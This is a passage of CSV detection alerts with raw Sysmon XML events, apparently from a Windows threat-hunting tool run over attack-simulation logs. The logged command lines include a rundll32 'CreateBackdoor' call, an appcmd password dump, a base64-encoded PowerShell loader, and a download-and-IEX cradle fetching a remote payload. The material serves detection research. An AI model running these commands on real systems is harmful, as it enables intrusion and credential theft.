<Execution ProcessID=""5924"" ThreadID=""6056"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-26 07:39:14.345</Data>
<Data Name=""ProcessGuid"">747F3D96-AE22-5D3A-0000-001096B24E00</Data>
<Data Name=""ProcessId"">1504</Data>
<Data Name=""Image"">C:\Windows\hh.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft® HTML Help Executable</Data>
<Data Name=""Product"">HTML Help</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\hh.exe&quot; C:\Users\IEUser\Desktop\Fax Record N104F.chm</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-ABD5-5D3A-0000-0020EB990F00</Data>
<Data Name=""LogonId"">0xf99eb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C</Data>
<Data Name=""ParentProcessGuid"">747F3D96-ABD7-5D3A-0000-001012661000</Data>
<Data Name=""ParentProcessId"">4940</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.195377Z"">
</TimeCreated>
<EventRecordID>243534</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.993</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-0010B9662000</Data>
<Data Name=""ProcessId"">7420</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.195377Z"">
</TimeCreated>
<EventRecordID>243534</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.993</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-0010B9662000</Data>
<Data Name=""ProcessId"">7420</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.195377Z"">
</TimeCreated>
<EventRecordID>243534</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.993</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-0010B9662000</Data>
<Data Name=""ProcessId"">7420</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.143393,2019-05-27T05:29:19.143393+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.143393Z"">
</TimeCreated>
<EventRecordID>5949</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.103</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001066B5FF00</Data>
<Data Name=""ProcessId"">2796</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1564434679.865791,2019-07-30T01:11:19.865791+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (&quot;C:\Windows\System32\wscript.exe&quot; /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt) and Parent Image :C:\Windows\SysWOW64\rundll32.exe , Parent CommandLine (&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,) in directory : ( C:\Users\IEUser\AppData\Local\Temp\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:19.098105Z"">
</TimeCreated>
<EventRecordID>4865</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:19.010</Data>
<Data Name=""ProcessGuid"">747F3D96-60F7-5D3F-0000-00106F2F5600</Data>
<Data Name=""ProcessId"">6160</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\wscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\wscript.exe&quot; /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
<Data Name=""ParentProcessId"">4884</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1074] Data Staged - Process,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.215719Z"">
</TimeCreated>
<EventRecordID>4910</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.170</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ProcessId"">5816</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.215719Z"">
</TimeCreated>
<EventRecordID>4910</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.170</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ProcessId"">5816</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka105.inwitelecom.net ) , IP ( 105.73.6.105 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:33:01.141798Z"">
</TimeCreated>
<EventRecordID>4132</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3628"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 06:58:40.721</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7..home</Data>
<Data Name=""SourcePort"">49705</Data>
<Data Name=""SourcePortName""></Data>
